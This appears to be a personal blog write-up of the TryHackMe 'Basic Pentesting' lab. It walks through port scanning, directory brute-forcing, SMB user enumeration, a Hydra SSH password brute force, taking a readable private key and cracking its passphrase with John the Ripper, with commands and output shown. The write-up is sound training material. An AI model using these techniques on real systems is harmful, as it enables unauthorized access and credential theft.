Skip to main content

Basic Pentesting writeup [thm]

basic pentesting

This is a machine that allows you to practise web app hacking and privilege escalation

Basic Pentesting. I'd completely forgotten about writing this. Since I had this writeup collecting binary dust on my hard drive why not publish it with some slight improvements? I didn't re-do the challenge to verify that everything checks out though.

This writeup contains some minor spoilers (usernames).

Task 1 Web App Testing and Privilege Escalation

In these set of tasks you'll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible.

Deploy the machine and connect to our network

Just run 

$: sudo openvpn [REDACTED].ovpn

in a terminal.

Find the services exposed by the machine

$: nmap $target

Yields:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-08 23:07 CET
Nmap scan report for $target
Host is up (0.075s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds

Inspecting the web server gives us the following information:

<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

What is the name of the hidden directory on the web server?

Now run dirbuster, I used the GUI with the wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt.

This will get us /development/

Visiting http://$target/development we find two files:

dev.txt:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

and j.txt:

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

From this we get some useful information. We know that we have at least two users on the system 'k' and 'j' where the later is known to have a weak password.

What is the username?

In the nmap output we saw that there was open SMB ports.

By running 

$: enum4linux -a $target

we get lots of information on the samba setup ending with:

...
S-1-5-21-2853212168-2008227510-3551253869-1037 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1038 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1039 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1040 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1041 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1042 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1043 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1044 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1045 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1046 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1047 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1048 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1049 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
![pic](+) Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

So we found the user names 'kay' and 'jan'!

What is the password?

Since we know, from the notes, that jan has a weak password we can try to crack it by attacking the SSH server with Hydra.

$: hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$target
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-08 23:30:19
![pic](WARNING) Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
![pic](DATA) max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
![pic](DATA) attacking ssh://$target:22/

![pic](STATUS) 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active
![pic](STATUS) 127.33 tries/min, 382 tries in 00:03h, 14344019 to do in 1877:30h, 16 active
![pic](22)[ssh] host: $target   login: jan   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
![pic](WARNING) Writing restore file because 4 final worker threads did not complete until end.
![pic](ERROR) 4 targets did not resolve or could not be connected
![pic](ERROR) 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-08 23:36:55

The password of jan is [REDACTED].

What service do you use to access the server?

We can now access the server via SSH using this password.

ssh jan@$target

Looking around we at first find nothing interesting. We go to the home directory of kay. Here we find a file pass.bak but permission denied. We can't read it. But looking in /home/kay/.ssh we find a readable private RSA key. Note to self: make sure that SSH keys always has proper permissions.

There is also a note in authorized_keys along the lines of

I don't have to type long passwords anymore

Stealing id.rsa to our work station. The first thing we try is of course to login directly using this key in hope that the key has no password protection.

$: ssh -i id_rsa kay@$target

But we have no such luck.

However, the note indicated that the key has a short-ish password so maybe we can crack it?

First, we must convert it to a John The Ripper friendly format.

$: /usr/share/john/ssh2john.py key > hash

Then we run John with the classic rockyou wordlist.

$: john hash -wordlist=/usr/share/wordlists/rockyou.txt 
Created directory: /home/[REDACTED]/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]          (key)
1g 0:00:00:09 DONE (2021-03-09 00:02) 0.1003g/s 1438Kp/s 1438Kc/s 1438KC/s *7¡Vamos!
Session completed

The password is '[REDACTED]'!

We can now login:

$: ssh -i id_ra kay@$target
$: cat pass.bak 
[REDACTED]

And we are done, room completed!

Conclusion

I found this writeup lying around collecting dust in my wiki. Completely forgotten. I was initially surprised how decent this writeup was but that's just because I mostly copied stuff from this video walkthrough.

Actually that video was how I found out about TryHackMe and Basic Pentesting was the very first challenge I "solved". I thought it would be fun to publish a writeup of my very first CTF.

At the time, I was clueless and had absolutely no idea what I was doing. I knew most of the tools but my experience of using them prior to this was limited, to say the least. Maybe with the exception of Nmap.

Despite just following the video walkthrough, I distinctly remember it being a very good feeling when I got in.

This challenge would probably be slightly too easy for me now. Which means that I've progressed.

I'm glad I found out about Gobuster.

Tools used

  • Nmap
  • Dirbuster
  • Firefox
  • Enum4linux
  • Hydra
  • ssh2john.py
  • John the Ripper
  • SSH